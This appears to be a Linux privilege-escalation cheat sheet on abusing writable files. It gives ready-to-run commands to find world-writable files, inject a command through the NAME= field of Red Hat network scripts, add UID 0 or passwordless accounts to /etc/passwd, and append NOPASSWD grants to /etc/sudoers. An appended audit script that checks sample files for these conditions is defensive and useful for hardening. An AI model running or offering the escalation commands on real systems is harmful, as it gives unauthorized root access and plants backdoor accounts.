Writable Files
List world writable files on the system.
find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
find / -perm -2 -type f 2>/dev/null
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
- Writable /etc/sysconfig/network-scripts/ (CentOS/Red Hat)
In my case, the NAME= attribute in these network scripts is not handled correctly. If you have white/blank space in the name, the system tries to execute the part after the white/blank space. Which means everything after the first blank space is executed as root.
/etc/sysconfig/network-scripts/ifcfg-1337 for example
NAME=Network /bin/id  <= Note the blank space
ONBOOT=yes
DEVICE=eth0
EXEC : ./etc/sysconfig/network-scripts/ifcfg-1337
src : https://vulmon.com/exploitdetailsqidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f
- Writable /etc/passwd
First generate a password with one of the following commands.
openssl passwd -1 -salt hacker hacker
openssl passwd {password}
mkpasswd -m SHA-512 hacker
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
Then add the user hacker and add the generated password.
hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash
E.g: hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
You can now use the su command with hacker:hacker
Alternatively you can use the following lines to add a dummy user without a password.
WARNING: you might degrade the current security of the machine.
echo 'dummy::0:0::/root:/bin/bash' >> /etc/passwd
su - dummy
You can also modify the root password:
root:GENERATED_PASSWORD_HERE:0:0:root:/root:/bin/bash
su root
(Then type the password you selected with openssl)
- Writable /etc/sudoers
echo "username ALL=(ALL:ALL) ALL" >> /etc/sudoers
To use sudo without a password:
echo "username ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
echo "username ALL=NOPASSWD: /bin/bash" >> /etc/sudoers
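A defender-side check for the conditions described on this page, as an added example that is not part of the original page: it flags extra UID 0 accounts and empty password fields in a passwd-format file, NOPASSWD grants in a sudoers-format file, unquoted NAME= values containing whitespace in an ifcfg file, and world-writable paths. The function names and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Added audit example; function names and sample data are constructed.

# passwd-format file: UID 0 accounts other than root, and empty password fields.
audit_passwd() {
    awk -F: '$1 != "root" && $3 == 0 { print "uid0:" $1 }
             $2 == ""                { print "nopass:" $1 }' "$1"
}

# sudoers-format file: non-comment lines that grant NOPASSWD.
audit_sudoers() {
    awk '!/^[ \t]*#/ && /NOPASSWD/ { print "nopasswd:" $1 }' "$1"
}

# ifcfg file: NAME= with an unquoted value containing whitespace followed by
# more text, the pattern the quoted report says is executed as root.
audit_ifcfg() {
    awk '/^NAME=/ {
        v = substr($0, 6); c = substr(v, 1, 1)
        if (c != "\"" && c != "\047" && v ~ /[ \t]+[^ \t#]/) print "unquoted:" $0
    }' "$1"
}

# Any of the given paths that are world-writable (same -perm -2 test as above).
audit_perms() {
    find "$@" -prune -perm -2 -print 2>/dev/null
}

# Constructed sample files written into directory $1.
make_samples() {
    printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
        'alice:x:1000:1000::/home/alice:/bin/bash' \
        'svc:x:0:0::/root:/bin/bash' \
        'guest::1001:1001::/home/guest:/bin/sh' > "$1/passwd"
    printf '%s\n' '# NOPASSWD in a comment is ignored' \
        'root ALL=(ALL:ALL) ALL' \
        'deploy ALL=(ALL) NOPASSWD:ALL' > "$1/sudoers"
    printf '%s\n' 'NAME=Network /bin/id' 'ONBOOT=yes' 'DEVICE=eth0' > "$1/ifcfg-bad"
    printf '%s\n' 'NAME="Office LAN"' 'ONBOOT=yes' 'DEVICE=eth1' > "$1/ifcfg-ok"
    chmod 644 "$1/passwd"; chmod 666 "$1/sudoers"
}

d=$(mktemp -d) && make_samples "$d"
audit_passwd "$d/passwd"; audit_sudoers "$d/sudoers"
audit_ifcfg "$d/ifcfg-bad"; audit_ifcfg "$d/ifcfg-ok"
audit_perms "$d/passwd" "$d/sudoers"
rm -rf "$d"
```

On a live host, point the functions at /etc/passwd, /etc/sudoers and the files under /etc/sysconfig/network-scripts/ instead of the samples; any output is a finding to review.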